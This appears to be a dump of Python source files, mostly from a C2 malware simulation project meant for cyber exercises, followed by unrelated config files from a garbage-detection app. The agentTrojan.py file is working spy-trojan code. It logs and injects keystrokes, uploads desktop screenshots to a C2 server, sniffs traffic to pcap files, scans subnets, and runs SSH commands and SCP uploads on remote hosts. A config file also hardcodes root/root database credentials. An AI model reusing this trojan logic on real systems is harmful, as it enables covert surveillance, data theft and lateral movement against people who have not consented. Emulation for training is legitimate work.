handleFun=None): """ Add the a cmd need to be executed in the current connector. (remove all the cmds in the command list if the input is 'None') Args: cmdline (string): command line string. handleFun: a function used to handle the command response. default use None. Below reply dict will be passed in the handle function. reply = { 'host': self.host, 'cmd': cmdline, 'reply':stdout.read().decode()} """ if cmdline is None: self.cmdlines = [] else: self.cmdlines.append((cmdline, handleFun)) def clearCmdList(self): self.cmdlines = [] #----------------------------------------------------------------------------- def addSudoPassword(self, sudoPassword): """ Add the sudo password for the current connector. Args: sudoPassword (string): sudo password. """ self.sudoPassword = sudoPassword #----------------------------------------------------------------------------- def clearChildren(self): """ Remove all the children connectors.""" self.close() self.lock = False self.childConnectors = [] #----------------------------------------------------------------------------- def updateParent(self, parent): """ Update the current connector's parent if it doesn't have one.""" if not self.parent: self.parent = parent return True return False #----------------------------------------------------------------------------- def InitTunnel(self): """ Lock the setting and init the ssh chain tunnel.""" self.lock = True # lock the connector's edit after tunnel init. self.client = paramiko.SSHClient() self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) result = True if self.parent and self.parent.client: # the parent's client need to be init. # create a transport socket channel if the connector is mid jumphost. transport = self.parent.client.get_transport() srcAddr = (self.parent.host, self.parent.port) destAddr = (self.host, self.port) # create the channle from parent to current host. channel = transport.open_channel(CH_KIND, destAddr, srcAddr) try: self.client.connect(self.host, username=self.username, password=self.password, port=self.port, sock=channel) except Exception as err: print("SSH connection error > InitTunnel(): %s" % str(err)) result = False else: try: self.client.connect(self.host, username=self.username, password=self.password, port=self.port) except Exception as err: print("SSH connection error > InitTunnel(): %s" % str(err)) result = False # Init all the children. for childconnector in self.childConnectors: rst = childconnector.InitTunnel() result &= rst self.connected = result return result #----------------------------------------------------------------------------- def runCmd(self, interval=0.1): """ Run the cmd in the command queue one by one, sleep time interval after finihsed executed one command. Args: interval (_type_, optional): Sleep time after time interval (unit second). Defaults to None. """ if not self.lock: print("Error > runCmd(): can not run cmd, please init the tunnel first!") return None for cmdset in self.cmdlines: cmdline, handleFun = cmdset print("Run cmd in host: %s" % str(self.host)) # Request a pseudo-terminal for the sudo to input the admin password. pty = 'sudo' in cmdline stdin, stdout, stderr = self.client.exec_command(cmdline, get_pty=pty) # edited# # Input the sudo password, TODO: will add the function updateSudoPasswd() later. if pty: sudoPasswordStr = self.password if self.sudoPassword is None else self.sudoPassword stdin.write('%s\n' % sudoPasswordStr) stdin.flush() if interval: time.sleep(interval) # Handle the cmd reply. cmdRst = stdout.read().decode() if not cmdRst: cmdRst = stderr.read().decode() rplDict = {'host': self.host, 'cmd': cmdline, 'reply':cmdRst} if self.replyHandler or handleFun else None if handleFun: handleFun(rplDict) if self.replyHandler: self.replyHandler(rplDict) for childconnector in self.childConnectors: childconnector.runCmd(interval=interval) #----------------------------------------------------------------------------- def getTransport(self): if not self.lock: print("The tunnel is not init, please call the initTunnel first!") return None else: return self.client.get_transport() #----------------------------------------------------------------------------- def setAllreplyHandler(self, func): """ set the replay handler for all the cmd's reply. Args: func (reference): function. """ self.replyHandler = func #----------------------------------------------------------------------------- def close(self): """ Close all session.""" for childConnector in self.childConnectors: childConnector.close() if self.client: self.client.close() #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def printRst(data): print("Host: %s" % data['host']) print("Cmd: %s" % data['cmd']) print("Result:\n%s" % data['reply']) def main(): print("Test init single line ssh tunnel connection through multiple jumphosts.") jumphostNum = int(input("Input jumphost number (int):")) mainHost = None jpHost = None tgtHost = None # init all the jump host connectors if jumphostNum > 0: for i in range (int(jumphostNum)): host = str(input("Input jumphost %d hostname:"%(i+1))) username = str(input("Input jumphost %d username:"%(i+1))) password = str(input("Input jumphost %d password:"%(i+1))) if i == 0: mainHost = sshConnector(None, host, username, password) jpHost = mainHost elif 0 < i < jumphostNum-1: nextjpHost = sshConnector(mainHost, host, username, password) jpHost.addChild(nextjpHost) jpHost = nextjpHost # Init the target host connector host = str(input("Input target hostname:")) username = str(input("Input target username:")) password = str(input("Input target password:")) tgtHost = sshConnector(None, host, username, password) if mainHost is None: mainHost = tgtHost else: mainHost.addChild(tgtHost) initRst = mainHost.InitTunnel() if not initRst: print("Init tunnel failed! exist...") return None terminate = False while not terminate: cmd = input("Input command:") if cmd == "exit": terminate = True else: tgtHost.addCmd(None, None) tgtHost.addCmd(cmd, printRst) mainHost.runCmd() mainHost.close() #----------------------------------------------------------------------------- if __name__ == '__main__': main()
12,273
Python
.py
262
36.935115
118
0.527878
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,489
Log.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/Log.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: Log.py # # Purpose: This module is used to log the program execution information.( # info, warning, debug, error) # # Author: Yuancheng Liu # # Created: 2020/07/13 # Copyright: # License: #----------------------------------------------------------------------------- import os import time import logging import logging.handlers import traceback DEFAULT_LOGGER_NAME = 'Log' ROLLOVER_LENGTH = 1.0e7 + 1 # Python 'handlers' compares >= length(roll at 10MB) # Init global parametersL gLogger = None # logger generator object gHandler = None # logging handler gLogDir = None # log directory path gCrtDir = '' # current log gPutLogsUnderDate = False # flag to identify whether put log file under data folder. #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class RotateFileHandler(logging.handlers.RotatingFileHandler): """ Standard RotatingFileHandler makes a mess of file names that end in .txt - this version inserts an index in between the name and the suffix. """ def __init__(self, filename, *args, **kwargs): # filenameBase is just the base name - make up better name by adding date/time self.filenameBase = filename self.autoTReset = False # flag to identify whether auto reset filename time. self.crtTime = None # Current time string. self.crtSuffix = 0 # Current Suffix index. fName = self.buildFilename(fResetTime=True) logging.handlers.RotatingFileHandler.__init__(self, fName, *args, **kwargs) #--RotateFileHandler----------------------------------------------------------- def buildFilename(self, fResetTime=False): """ Generate the latest logfile's name based on the current time.""" yyyymmdd, hhmmss = getLogTime() # put in folder by today's date if fResetTime: # reset time part of name crtTime = yyyymmdd + '_' + hhmmss # save creation date & time if self.crtTime != crtTime: self.crtSuffix = 0 self.crtTime = crtTime self.crtSuffix += 1 # advance to next suffix fileName = self.filenameBase + '_' + self.crtTime + '_' + str(self.crtSuffix) + '.txt' pathName = getLogFilePath(yyyymmdd, fileName) if gPutLogsUnderDate else getLogFilePath(fileName) return pathName #--RotateFileHandler----------------------------------------------------------- def doRollover(self, fResetTime=False): """ Handle rollover for TimedRotatingFileHandler. """ if self.stream: self.stream.close() # in case someone still tries to write & opens file #self.baseFilename = 'TempBogusLog.txt' fResetTime = fResetTime or self.autoTReset self.baseFilename = self.buildFilename(fResetTime) self.mode = 'w' self.stream = self._open() #--RotateFileHandler----------------------------------------------------------- def handleError(self, record): try: error('EXCEPTION in log: format str:"%s", args:%s' % (record.msg, record.args)) stk = traceback.format_stack(limit=12) error('Traceback follows:\n' + ''.join(stk[:-8])) except Exception as e: error('Traceback has exception:%s', e) #--RotateFileHandler----------------------------------------------------------- def setAutoTimeRest(self, fResetTime): """ Set the auto reset time flag for file name change during rotate.""" self.autoTReset = fResetTime #----------------------------------------------------------------------------- # Module Logging functions. #----------------------------------------------------------------------------- def callstack(*args): """ Print compact callstack, with introductory string.""" stk = traceback.extract_stack() debug(*args) for tup in stk[:-2]: fName, line, _, txt = tup debug('...%s:%i %s', os.path.split(fName)[1], line, txt) #----------------------------------------------------------------------------- def printArgs(*args): """ Call built in print function to show the arguments in cmd terminal.""" s = args[0] % args[1:] if len(args) > 1 else args[0] print(s) #----------------------------------------------------------------------------- def info(*args, printFlag=None): """ Log normal information message: Log.info("message %s", str(value))""" if gLogger: gLogger.info(*args) elif printFlag is None or printFlag: printArgs(*args) #----------------------------------------------------------------------------- def warning(*args, printFlag=None): """ Log wanring message: Log.wanring("message %s", str(value))""" if gLogger: gLogger.warning(*args) elif printFlag is None or printFlag: printArgs(*args) #----------------------------------------------------------------------------- def debug(*args, onFlag=True, printFlag=None): """ log debug message: Log.debug("message %s", str(value))""" if gLogger and onFlag: gLogger.debug(*args) elif printFlag is None or printFlag: printArgs(*args) #----------------------------------------------------------------------------- def error(*args, printFlag=None): """ Log error message: Log.debug("message %s", str(value))""" if gLogger: gLogger.error(*args) elif printFlag is None or printFlag: printArgs(*args) #----------------------------------------------------------------------------- def exception(*args, printFlag=None): """log exception message with the stack: Log.exception(e) """ if gLogger: error('***** EXCEPTION >>>>>') error(*args) error(traceback.format_exc(limit=12)) error('<<<<< EXCEPTION *****') elif printFlag is None or printFlag: print('***** EXCEPTION:') printArgs(*args) print(traceback.format_exc(limit=12)) #----------------------------------------------------------------------------- def getLogTime(now=None): """ Get current local time, return tuple for logging (yyyymmdd, hhmmss) Can pass floating point time, or leave empty for 'now' """ timeTuple = time.localtime() if now is None else time.localtime(now) tStr = time.strftime('%Y%m%d %H%M%S', timeTuple) return tStr.split() #----------------------------------------------------------------------------- def getLogFilePath(*args, logDir=None, folderFlg=False): """ Create the directory tree under the Log folder if necessary and finally return a fully qualified file name as string. - 'args' is a list of directories in the path to the filename in args[-1] """ global gCrtDir, gLogDir if len(args) == 0: print("getLogFilePath: Must provide the log fileName.") return myArgs = [logDir] if logDir else [gLogDir] _ = myArgs.extend(args) if folderFlg else myArgs.extend(args[:-1]) gCrtDir = os.path.join(*myArgs) if not os.path.exists(gCrtDir): os.makedirs(gCrtDir) filePath = gCrtDir if folderFlg else os.path.join(gCrtDir, args[-1]) return filePath #----------------------------------------------------------------------------- gConsole = None def setLogger(strm): """ Define a handler which writes INFO messages or higher to the specified stream. I had to change this for multiprocessing, to allow None for strm, to remove handler for subprocesses (cannot write to main process' screen in subprocess, so Log.info and Log.error, etc cannot be logged from subprocesses) - strm: stream, such as ScreenLog.ScreenLog, where we can write high priority messages """ global gConsole if strm is None: # called from sub-process or terminate - want to remove previous logger if gConsole is not None: gConsole.setFormatter(None) gLogger.removeHandler(gConsole) gConsole = None else: gConsole = logging.StreamHandler(strm) gConsole.setLevel(logging.INFO) # set a format which is simpler for console use formatter = logging.Formatter('%(levelname)-8s %(message)s') # tell the handler to use this format gConsole.setFormatter(formatter) # add the handler to the root logger gLogger.addHandler(gConsole) #----------------------------------------------------------------------------- def cleanOldFiles(dirName, fileNameBase, cnt): """ Examine files in 'dirName', and if we find any that start with 'fileNameBase', remove the oldest of those to keep no more than 'cnt' files in that dir This may be used for apps own logs, as well as the Log.xxx logs """ log_list = [] for f in os.listdir(dirName): # added every log file found into the log file list if f[0:len(fileNameBase)] == fileNameBase: log_list.append(f) if len(log_list) > cnt: # if # of log files found more than the maximum number # set current working directory prevDir = os.getcwd() os.chdir(dirName) # sort the file list according to modification time log_list.sort(key=lambda x: (os.stat(x).st_mtime, x)) # keep most recent log files and remove the old ones for i in range(len(log_list) - cnt): try: #print('Log.cleanOldFiles deleted: ', log_list[i]) os.remove(log_list[i]) except Exception: warning('Log: cleanOldFiles could not delete <%s>', log_list[i]) os.chdir(prevDir) #----------------------------------------------------------------------------- def initLogger(pwd, logDirName, appName, filePrefix, historyCnt=100, fPutLogsUnderDate=False, loggerName=DEFAULT_LOGGER_NAME, autoRestTime=False): """ Initialize logging - pwd: pathname of working directory under which we put logs - logDirName: put all logs into this dir, i.e. 'Logs' - appName: make subdir under LogDirName for this app. - filePrefix: prefix for log files, i.e. 'Hub' - historyCnt: # of log files to save (delete oldest if >this many files) - fPutLogsUnderDate: if True, we arrange to put log files into a daily folder, otherwise, they go directly into the Logs folder. - loggerName: name of this logger. """ global gLogger, gHandler, gLogDir, gPutLogsUnderDate assert pwd is not None # caller must set this up try: if gLogger is not None: # handling reinitializing try: gLogger.removeHandler(gHandler) del gLogger except Exception: exception('initLogger: Log could not delete gLogger') gLogger = None gHandler = None gPutLogsUnderDate = fPutLogsUnderDate gLogDir = getLogFilePath(logDirName, appName, logDir=pwd, folderFlg=True) if appName else getLogFilePath( logDirName, logDir=pwd, folderFlg=True) gLogger = logging.getLogger(loggerName) gHandler = RotateFileHandler(filePrefix, maxBytes=ROLLOVER_LENGTH) gHandler.setFormatter(logging.Formatter( '%(asctime)-15s %(levelname)-8s %(message)s')) gHandler.setAutoTimeRest(autoRestTime) gLogger.addHandler(gHandler) gLogger.setLevel(logging.DEBUG) except Exception as e: print('Logging setup exception:', e) # parse the directory to look for all the log files cleanOldFiles(os.path.dirname(gHandler.baseFilename), filePrefix, historyCnt) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def writeTest(mb=10): """Write 'mb' megabytes of junk to log""" print('writeTest messages: %iMB' % mb) lineLen = 100 hdrLen = 33 + 7 + 1 # header per line, plus len of line #, plus lf pad = '$' * (lineLen - hdrLen) for i in range((mb * 1000000) // lineLen//4): info('%06i %s', i, pad) warning('%06i %s', i, pad) debug('%06i %s', i, pad) error('%06i %s', i, pad) def testCase(): TOPDIR = 'Log' # folder name where we put Logs, Maps, etc gWD = os.getcwd() #print('gWD:%s' % gWD) idx = gWD.find(TOPDIR) #print('idx:%i' % idx) if idx != -1: gTopDir = gWD[:idx + len(TOPDIR)] # found it - truncate right after TOPDIR else: gTopDir = gWD # did not find TOPDIR - use WD print('gTopDir:%s' % gTopDir) logSz = 15 # create 15 MB logfiles. initLogger(gTopDir, 'Logs', 'LogTest1', 'Test', historyCnt=100, fPutLogsUnderDate=True) writeTest(logSz) time.sleep(1) initLogger(gTopDir, 'Logs', 'LogTest2', 'Test', historyCnt=5, fPutLogsUnderDate=False, autoRestTime=True) writeTest(logSz) pass if __name__ == '__main__': testCase() print('End of __main__')
13,352
Python
.py
288
39.503472
113
0.556621
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,490
c2MwUtilsTest.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/c2MwUtilsTest.py
#----------------------------------------------------------------------------- # Name: c2MwUtilsTest.py # # Purpose: This module is one of the test case C2 backdoor Trojan program # (hook with the C2-client) example which inherited from <c2MwUtils> # module's <c2TestMalware> class. # # Author: Yuancheng Liu # # Version: v_0.2.3 # Created: 2023/10/19 # Copyright: Copyright (c) 2023 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program design: We want to implement a remote backdoor trojan which can carry other Malicious Action function to build a remote controlable malware which can linked in our C2 emulation system (https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/c2Emulator) This program will be used in the testRun attack demo and verfication of the cyber event : Cross Sward 2023 """ import os import sys import time import c2MwUtils HTTPS_FLG = False # flag to identify whether connect to C2 via http/https TEST_TASK_FLG = True dirpath = os.path.dirname(os.path.abspath(__file__)) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class c2BackdoorTrojan(c2MwUtils.c2TestMalware): def __init__(self, malwareID, ownIp, c2Ipaddr, c2port=5000, reportInt=10, tasksList=None, c2HttpsFlg=HTTPS_FLG, cmdTDFlg=False) -> None: super().__init__(malwareID, ownIp, c2Ipaddr, c2port=c2port, reportInt=reportInt, tasksList=tasksList, c2HttpsFlg=c2HttpsFlg, cmdTDFlg=cmdTDFlg) print("c2Backdoor Trojan init finished") #----------------------------------------------------------------------------- def _preporcessTasks(self): if TEST_TASK_FLG: return None if not self.tasksList is None: # Append on file upload task self.tasksList.append({ 'taskID' : 1, 'taskType' : c2MwUtils.TSK_TYPE_UPLOAD, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : c2MwUtils.TASK_A_FLG, 'taskData' : [os.path.join(dirpath, "update_installer.zip")] }) # Append one file download task self.tasksList.append({ 'taskID' : 2, 'taskType' : c2MwUtils.TSK_TYPE_DOWNLOAD, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : c2MwUtils.TASK_A_FLG, 'taskData' : ['picctureTestDownload.png','readme.pdf'] }) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def main(): malwareID = 'c2backDoorTrojan' c2Ipaddr = '127.0.0.1' malownIP = '192.168.50.11' client = c2BackdoorTrojan(malwareID, malownIP, c2Ipaddr) time.sleep(1) client.run() client.stop() #----------------------------------------------------------------------------- if __name__ == '__main__': main()
3,235
Python
.py
71
38.859155
151
0.496515
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,491
agentGlobal.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/ninjaMwAgent/agentGlobal.py
#----------------------------------------------------------------------------- # Name: agentGlobal.py # # Purpose: This module is used as a local config file to set constants, # global parameters which will be used in the other modules. # # Author: Yuancheng Liu # # Created: 2024/05/16 # version: v0.2.2 # Copyright: Copyright (c) 2022 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ For good coding practice, follow the following naming convention: 1) Global variables should be defined with initial character 'g' 2) Global instances should be defined with initial character 'i' 2) Global CONSTANTS should be defined with UPPER_CASE letters """ import os import sys print("Current working directory is : %s" % os.getcwd()) dirpath = os.path.dirname(os.path.abspath(__file__)) print("Current source code location : %s" % dirpath) APP_NAME = ('ninjaAgent', 'trojan') TOPDIR = 'src' LIBDIR = 'lib' idx = dirpath.find(TOPDIR) gTopDir = dirpath[:idx + len(TOPDIR)] if idx != -1 else dirpath # found it - truncate right after TOPDIR # Config the lib folder gLibDir = os.path.join(gTopDir, LIBDIR) if os.path.exists(gLibDir): sys.path.insert(0, gLibDir) import Log Log.initLogger(gTopDir, 'Logs', APP_NAME[0], APP_NAME[1], historyCnt=100, fPutLogsUnderDate=True) #----------------------------------------------------------------------------- # load the config file. import ConfigLoader CONFIG_FILE_NAME = 'AgentConfig.txt' gGonfigPath = os.path.join(dirpath, CONFIG_FILE_NAME) iConfigLoader = ConfigLoader.ConfigLoader(gGonfigPath, mode='r') if iConfigLoader is None: print("Error: The config file %s is not exist.Program exit!" %str(gGonfigPath)) exit() CONFIG_DICT = iConfigLoader.getJson() #----------------------------------------------------------------------------- # Init the logger import Log Log.initLogger(gTopDir, 'Logs', APP_NAME[0], APP_NAME[1], historyCnt=100, fPutLogsUnderDate=True) # Init the log type parameters. DEBUG_FLG = False LOG_INFO = 0 LOG_WARN = 1 LOG_ERR = 2 LOG_EXCEPT = 3 def gDebugPrint(msg, prt=True, logType=None): if prt: print(msg) if logType == LOG_WARN: Log.warning(msg) elif logType == LOG_ERR: Log.error(msg) elif logType == LOG_EXCEPT: Log.exception(msg) elif logType == LOG_INFO or DEBUG_FLG: Log.info(msg) #----------------------------------------------------------------------------- gMalwareID = CONFIG_DICT['OWN_ID'] gOwnIP = CONFIG_DICT['OWN_IP'] gStoreDir = os.path.join(dirpath, CONFIG_DICT['DOWNLOAD_DIR'] if 'DOWNLOAD_DIR' in CONFIG_DICT.keys() else 'Download') gC2Ipaddr = CONFIG_DICT['C2_IP'] gC2Port = int(CONFIG_DICT['C2_PORT']) gC2RptInv = int(CONFIG_DICT['C2_RPT_INV']) gC2HttpsFlg = CONFIG_DICT['C2_HTTPS'] if 'C2_HTTPS' in CONFIG_DICT.keys() else False
2,953
Python
.py
74
37.310811
118
0.611634
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,492
agentTrojan.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/ninjaMwAgent/agentTrojan.py
#----------------------------------------------------------------------------- # Name: agentTrojan.py # # Purpose: This spy trojan emulation malware is modified from the backdoor # trojan program <backdoorTrojan.py> by adding the network scanning # function, traffic eavesdropping, ssh connection, scp file transfer, # keyboard logging function, fake keyboard event generate function and # user's desktop screen shot function. # # Author: Yuancheng Liu # # Version: v_0.2.3 # Created: 2023/12/19 # Copyright: Copyright (c) 2023 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program design: We want to implement a spy backdoor malware program which can be linked in our C2 emulation system (https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/c2Emulator) to finish the stage 1 attack, This program will be used in the LS2024 cyber event : Lock Shield 2024 """ import os import time from datetime import datetime from PIL import Image import pyscreenshot as ImageGrab import agentGlobal as gv import c2Constants import c2MwUtils import nmapUtils import keyEventActors from tsharkUtils import trafficSniffer from SCPconnector import scpConnector from SSHconnector import sshConnector #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class spyTrojan(c2MwUtils.c2TestMalware): def __init__(self, malwareID, ownIp, c2Ipaddr, c2port=5000, reportInt=10, downloadDir=gv.dirpath, tasksList=None, c2HttpsFlg=False, cmdTDFlg=False) -> None: """ Init example: client = falseCmdInjector(malwareID, ownIP, c2Ipaddr, c2port=c2Port, reportInt=c2RptInv, tasksList=taskList, c2HttpsFlg=c2HttpsFlg) Args: malwareID (str): malware id ownIp (str): malware ip address c2Ipaddr (str): c2 server IP address reportInt (int, optional): time interval between 2 report to c2. Defaults to 10 sec. downloadDir(str, optional): download directory. Defaults to gv.dirpath. tasksList (list of dict, optional): refer to <programRcd> taskList. Defaults to None. c2HttpsFlg (bool, optional): flag to identify whether connect to c2 via https. Defaults to False. cmdTDFlg (bool, optional): flag to identify whether run the command execution task in the command runner's sub-thread. Defaults to False. """ super().__init__(malwareID, ownIp, c2Ipaddr, c2port=c2port, reportInt=reportInt, downloadDir=downloadDir,\ tasksList=tasksList, c2HttpsFlg=c2HttpsFlg, cmdTDFlg=cmdTDFlg) print("SpyTrojan init finished.") #----------------------------------------------------------------------------- def _initActionHandlers(self): """ Init the special malicious action handling module. """ # Init the networkScanner module. self.netScanner = nmapUtils.nmapScanner() # Init the keyboard event actor module. self.keyLogger = keyEventActors.keyEventActor() # Init the network sniffer for eavesdropping / mirroring module. self.sniffer = trafficSniffer() #----------------------------------------------------------------------------- def _startSubThreads(self): self.keyLogger.start() #----------------------------------------------------------------------------- def _handleSpecialTask(self, taskDict): """ Define all the special task handling function call here. Args: taskDict (dict): _description_ Returns: _type_: task execution result string. """ resultStr = 'taskTypeNotFound' if taskDict['taskType'] == c2Constants.TSK_TYPE_SCANNET: # Scan the subnet resultStr = self.scanSubnet(taskDict['taskData']) if taskDict['taskType'] == c2Constants.TSK_TYPE_KEYBD: # Generate or record the keyboard event. resultStr = self.handleKeyEvent(taskDict['taskData']) if taskDict['taskType'] == c2Constants.TSK_TYPE_SCREENST: # 'screenShot': resultStr = self.uploadScreenShot(taskDict['taskData']) if taskDict['taskType'] == c2Constants.TSK_TYPE_SCP: #'scpFile': resultStr = self.scpFile(taskDict['taskData']) if taskDict['taskType'] == c2Constants.TSK_TYPE_SSH: #'sshRun': resultStr = self.sshRunCmd(taskDict['taskData']) if taskDict['taskType'] == c2Constants.TSK_TYPE_EAVESDP: #'eavesDrop': resultStr = self.eavesDrop(taskDict['taskData']) return resultStr #----------------------------------------------------------------------------- def eavesDrop(self, taskData): """ Eavesdropping the traffic and save in pcap file, then upload to C2. Args: taskData (str): example: <nic_Name>;<interface_ID>;<captureTimeInterval> Returns: str: captured file name if eavesdrop successful else error message. """ nicName, interface, timeInt = str(taskData).split(';') timeInt = int(timeInt) self.sniffer.setNicInfo(nicName, interface) now = datetime.now() fileName = 'eavesdroping_%s.pcap' % str(now.strftime("%Y_%m_%d_%H_%M_%S")) filePath = os.path.join(gv.gStoreDir, fileName) rst = self.sniffer.capture2File(filePath, timeoutInt=timeInt) return self.sniffer.getLastCaptureFilePath() if rst else "Error: eavesdroping fail" #----------------------------------------------------------------------------- def sshRunCmd(self, taskData): """ SSH login to a remote host and run command. Args: taskData (str): example: <ip>;<userName>;<password>;<command str> Returns: _type_: _description_ """ try: mainInfo = str(taskData).split(';') ipaddress = mainInfo[0] userName = mainInfo[1] passWord = mainInfo[2] cmdStr = mainInfo[3] mainHost = sshConnector(None, ipaddress, userName, passWord) mainHost.addCmd(cmdStr, print) mainHost.InitTunnel() mainHost.runCmd(interval=0.1) mainHost.close() return "SSH login and run cmd on target." except Exception as err: return str(err) #----------------------------------------------------------------------------- def scpFile(self, taskData): """ SCP a file from current host to a remote host. Args: taskData (_type_): example: <ip>;<userName>;<password>;<file path> Returns: _type_: _description_ """ try: mainInfo = str(taskData).split(';') ipaddress = mainInfo[0] userName = mainInfo[1] passWord = mainInfo[2] filename = mainInfo[3] destInfo = (ipaddress, userName, passWord) scpClient = scpConnector(destInfo, showProgress=True) uploadFileName = os.path.join(gv.gStoreDir, filename) scpClient.uploadFile(uploadFileName, filename) scpClient.close() return "SCP file %s to target." %str(filename) except Exception as err: return str(err) #----------------------------------------------------------------------------- def scanSubnet(self, taskData): """ Scan the targeted subnet. Args: taskData (str): subnet string example: 10.10.106.0/24 Returns: _type_: _description_ """ subnetStr = str(taskData) rst = self.netScanner.scanSubnetIps(subnetStr) return str(rst) #----------------------------------------------------------------------------- def uploadScreenShot(self, taskData): """ Screen shot the user desktop and upload the screen file to C2 hub. Args: taskData (str): 'None' will auto generate a file name <malwareID>_<timestamp>.png Returns: _type_: _description_ """ filename = self.malwareID+'_'+str(datetime.now().strftime('%Y_%m_%d_%H_%M_%S'))+'.png' if taskData is None or taskData == 'None' else taskData if not '.png' in filename: filename += '.png' filePath = os.path.join(gv.gStoreDir, filename) try: screenshot = ImageGrab.grab() screenshot.save(filePath) self.c2Connector.transferFiles([filePath],uploadFlg=True) return "Upload screenshot: %s" % filename except Exception as err: print("Error: uploadScreenShot() > screen shot capture error: %s " %str(err)) return "Capture screenshot error" #----------------------------------------------------------------------------- def handleKeyEvent(self, taskData): """ Handle the keyboard event. Args: taskData (str): <keyboard event cmd key>;<keyboard event paramters> Returns: _type_: _description_ """ cmd, parm = taskData.split(';') if cmd == 'startRcd': rcdTime = int(parm) self.keyLogger.startLogKeyInput(recordTime=rcdTime) return "startRcd: %s " % str(datetime.now().strftime('%Y-%m-%d %H:%M:%S')) elif cmd == 'stopRcd': self.keyLogger.stopLogKeyInput() rcdFile = str(parm) if not rcdFile == 'None': rcdPath = os.path.join(gv.gStoreDir, rcdFile) try: with open(rcdPath, 'a') as fh: for event in self.keyLogger.getKeyEventList(): fh.write(event.to_json()) except Exception as err: print("Error to create the key log file: %s" %str(err)) return "LoginfileError" return "stopRcd: %s " % str(datetime.now().strftime('%Y-%m-%d %H:%M:%S')) elif cmd == 'getEvent': rstType = str(parm) if rstType == 'simple': keyStr = str(self.keyLogger.getKeyEventRcdStr()) print("Return keystr %s to C2" %keyStr) return keyStr elif rstType == 'detail': keyevents = self.keyLogger.getKeyEventList() evetList = [event.to_json() for event in keyevents] return str(evetList) elif cmd == 'clearRcd': self.keyLogger.clearRecord() return "clearRcd: %s " % str(datetime.now().strftime('%Y-%m-%d %H:%M:%S')) elif cmd == 'typeInStr': typeinStr = str(parm) self.keyLogger.typeStr(typeinStr) return "Finished Type in String." else: return 'taskTypeNotFound' #----------------------------------------------------------------------------- def stop(self): super().stop() self.keyLogger.stop() #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def main(): # Create the module download folder. if not os.path.isdir(gv.gStoreDir): os.mkdir(gv.gStoreDir) # Add the pre task here taskList = [ { 'taskID': 0, 'taskType': 'register', 'StartT': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'repeat': 1, 'ExPerT': 0, 'state' : c2Constants.TASK_R_FLG, 'taskData': None } ] # Init the agent agent = spyTrojan(gv.gMalwareID, gv.gOwnIP, gv.gC2Ipaddr, downloadDir=gv.gStoreDir, c2port=gv.gC2Port, reportInt=gv.gC2RptInv, tasksList=taskList, c2HttpsFlg=gv.gC2HttpsFlg) time.sleep(1) agent.run() agent.stop() #----------------------------------------------------------------------------- if __name__ == '__main__': main()
12,402
Python
.py
263
36.958175
160
0.531382
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,493
extensions.py
FlatWhite233_yolov5_garbage_detect/yolov5_garbage_detect-backend/extensions.py
# extensions.py:解决循环引用的问题 from flask_sqlalchemy import SQLAlchemy from flask_mail import Mail db = SQLAlchemy() mail = Mail() # Windows下Flask报错提示 # UnicodeEncodeError: 'ascii' codec can't encode characters in position 52-55: ordinal not in range(128) # 解决方案:https://www.cnblogs.com/Flat-White/p/17261697.html
353
Python
.py
8
37.625
104
0.803987
FlatWhite233/yolov5_garbage_detect
8
1
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,494
config.py
FlatWhite233_yolov5_garbage_detect/yolov5_garbage_detect-backend/config.py
from datetime import timedelta # 可以随便写 越长越安全解密越慢 SECRET_KEY = 'Flat-White' # 访问令牌的过期时间为60分钟 JWT_ACCESS_TOKEN_EXPIRES = timedelta(minutes=60) # 刷新令牌的过期时间为30天 JWT_REFRESH_TOKEN_EXPIRES = timedelta(days=30) # 数据库配置 HOSTNAME = '127.0.0.1' PORT = 3306 USERNAME = 'root' PASSWORD = 'root' DATABASE = 'yolov5_garbage_detect' DB_URI = 'mysql+pymysql://{}:{}@{}:{}/{}?charset=utf8mb4'.format(USERNAME, PASSWORD, HOSTNAME, PORT, DATABASE) # DB_URI = f'mysql+pymysql://{USERNAME}:{PASSWORD}@{HOSTNAME}:{PORT}/{DATABASE}?charset=utf8mb4' SQLALCHEMY_DATABASE_URI = DB_URI # 邮箱配置 # 未配置邮箱账号以及授权码 如需使用请自行更改 MAIL_SERVER = 'smtp.qq.com' MAIL_USE_SSL = True MAIL_PORT = 465 MAIL_USERNAME = '[email protected]' MAIL_PASSWORD = 'xxx' MAIL_DEFAULT_SENDER = ("基于深度学习算法的垃圾检测系统", "[email protected]")
930
Python
.py
24
30.75
110
0.746612
FlatWhite233/yolov5_garbage_detect
8
1
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,495
export.py
